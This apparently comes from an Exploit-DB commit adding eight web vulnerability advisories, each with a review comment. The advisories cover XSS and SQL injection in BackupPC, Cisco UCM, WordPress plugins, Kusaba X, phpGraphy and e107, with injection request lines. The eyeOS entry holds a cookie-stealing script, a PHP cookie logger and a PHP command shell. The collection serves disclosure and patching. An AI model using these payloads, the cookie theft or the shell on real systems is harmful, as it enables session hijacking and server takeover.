Update: 2015-01-04
8 new exploits
commit e60ec300be
parent d83f13c6d1
9 changed files with 2439 additions and 2305 deletions
8
platforms/cgi/webapps/35676.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/47628/info
|
||||
|
||||
BackupPC is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/index.cgi?action=browse&host=localhost&num=99999%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
|
||||
http://www.example.com/index.cgi?action=RestoreFile&host=localhost&num=1&share=%3Cscript%3Ealert%28234%29%3C/script%3E&dir=
|
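Review bot: the BackupPC description names no affected or fixed version, although most other entries in this commit carry an "... is vulnerable" line; add one so readers can tell which installations need the upgrade. The prose also never names the inputs shown in the two request lines (`num` for `action=browse`, `share` for `action=RestoreFile`), which is what a maintainer needs to confirm the output encoding was fixed. The file is added as "Executable file" even though it is a plain-text advisory; a non-executable mode would be appropriate.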
8
platforms/jsp/webapps/35672.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/47607/info
|
||||
|
||||
Cisco Unified Communications Manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an authenticated attacker to compromise the affected device, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/ccmcip/xmldirectorylist.jsp?f=vsr'||0/1%20OR%201=1))%20--
|
||||
http://www.example.com/ccmcip/xmldirectorylist.jsp?f=vsr'||1/0%20OR%201=1))%20--
|
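Review bot: the description never names the affected input, which from the request lines is the `f` parameter of `/ccmcip/xmldirectorylist.jsp`, and it lists no affected or fixed Unified Communications Manager release. Name the page, the parameter and the versions in the prose so defenders can match the entry against access logs and patch levels. The two request lines differ only in `0/1` versus `1/0`, and the entry should say why both are listed.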
9
platforms/php/webapps/35673.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47620/info
|
||||
|
||||
The Daily Maui Photo Widget plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Daily Maui Photo Widget plugin 0.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wp-content/plugins/daily-maui-photo-widget/wp-dailymaui-widget-control.php?title=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
|
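Review bot: the description says "multiple cross-site scripting vulnerabilities" but the entry shows a single request, against the `title` parameter of `wp-dailymaui-widget-control.php`. Either list the other affected parameters or reword to the singular, so that a fix can be checked against every reported input.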
9
platforms/php/webapps/35674.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47622/info
|
||||
|
||||
The WP Photo Album plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
WP Photo Album 1.5.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wp-admin/admin.php?page=wp-photo-album/wppa.php&tab=del&id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
|
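Review bot: the request line targets `/wp-admin/admin.php`, an administration page, yet the description does not state that the affected user has to be logged in to the WordPress admin area. State that precondition in the prose, and name the `id` parameter of the `wp-photo-album/wppa.php` page (with `tab=del`) as the unsanitized input so the fix can be verified.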
9
platforms/php/webapps/35675.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47626/info
|
||||
|
||||
Kusaba X is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Versions prior to Kusaba X 0.9.2 are vulnerable.
|
||||
|
||||
http://www.example.com/kusabax/animation.php?board=b&id=1"><script>alert('XSS')</script><"
|
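Review bot: the request line carries its markup raw (`id=1"><script>...`), unlike the other XSS request lines in this commit, which are percent-encoded; encode it for consistency so the file renders safely in HTML-based viewers. The prose also says "multiple" vulnerabilities while only `animation.php` with the `id` parameter is shown; list the other affected inputs or reword.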
25
platforms/php/webapps/35677.txt
Executable file
|
@ -0,0 +1,25 @@
|
|||
source: http://www.securityfocus.com/bid/47629/info
|
||||
|
||||
eyeOS is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input passed through image content before using it in dynamically generated content.
|
||||
|
||||
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
|
||||
|
||||
Versions prior to eyeOS 1.9.0.3 are vulnerable.
|
||||
|
||||
<!doctype html>
|
||||
<script>
|
||||
var http = new XMLHttpRequest()
|
||||
var url = "http://localhost/report.php?" + "user=" + top.document.title + "&cookie=" + document.cookie;
|
||||
http.open("GET", url, true);
|
||||
http.send("");
|
||||
</script>
|
||||
|
||||
<?php
|
||||
$usercookies = fopen("usercookies", "a");
|
||||
fwrite($usercookies, "User: " . $_GET['user'] . "\t" ."Cookie: " . $_GET['cookie'] . "\n");
|
||||
?>
|
||||
|
||||
<?php
|
||||
system($_GET['cmd']);
|
||||
?>
|
||||
|
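Review bot: the three code fragments are unlabelled, and the prose never says which file each one belongs to or how they relate to the "image content" vector named in the description. The final fragment, `system($_GET['cmd']);`, is a generic command-execution script that the HTML-injection description does not account for; document its role in the report or drop it from the entry. A sentence on where eyeOS fails to validate or encode the image content would make the entry usable for verifying the 1.9.0.3 fix.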
9
platforms/php/webapps/35678.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47634/info
|
||||
|
||||
phpGraphy is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
phpGraphy 0.9.13b is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
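Review bot: the description does not name the affected input, which from the request line is `theme_dir` in `themes/default/header.inc.php`, a theme include file requested directly. Name the file and parameter in the prose, and add the fixed version if one exists, so the entry is searchable and a patch can be verified.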
49
platforms/php/webapps/35679.txt
Executable file
|
@ -0,0 +1,49 @@
|
|||
_____ _____ ______
|
||||
| _ | | _ ||___ /
|
||||
| |/' |_ __| |_| | / /
|
||||
| /| \ \/ /\____ | / /
|
||||
\ |_/ /> < .___/ /./ /
|
||||
\___//_/\_\\____/ \_/
|
||||
by bl4ck s3c
|
||||
|
||||
|
||||
# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
|
||||
# Date: 03-01-2014
|
||||
# Google Dork : Proudly powered by e107
|
||||
# Exploit Author: Ahmet Agar / 0x97
|
||||
# Version: 2.0.0
|
||||
# Vendor Homepage: http://e107.org/
|
||||
# Tested on: OWASP Mantra & Iceweasel
|
||||
|
||||
# Vulnerability Description:
|
||||
|
||||
CMS user details section is vulnerable to XSS. You can run XSS payloads.
|
||||
|
||||
XSS Vulnerability #1:
|
||||
|
||||
Go Update user settings page
|
||||
|
||||
"http://{target-url}/usersettings.php"
|
||||
|
||||
Set Real Name value;
|
||||
|
||||
"><script>alert(String.fromCharCode(88, 83, 83))</script>
|
||||
|
||||
or
|
||||
|
||||
"><script>alert(document.cookie)</script>
|
||||
|
||||
|
||||
========
|
||||
Credits:
|
||||
========
|
||||
|
||||
Vulnerability found and advisory written by Ahmet Agar.
|
||||
|
||||
===========
|
||||
References:
|
||||
===========
|
||||
|
||||
http://www.0x97.info
|
||||
htts://twitter.com/_HacKingZ_
|
||||
|
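Review bot: the second reference reads `htts://twitter.com/_HacKingZ_`, missing the `p` in the scheme, so the link is dead as written. The header `# Date: 03-01-2014` sits a year before this commit's 2015-01-04 update and is worth confirming with the author. Unlike the other seven files, this entry has no `source:` line, and the description says only "user details section" without stating where the Real Name value is later rendered unescaped.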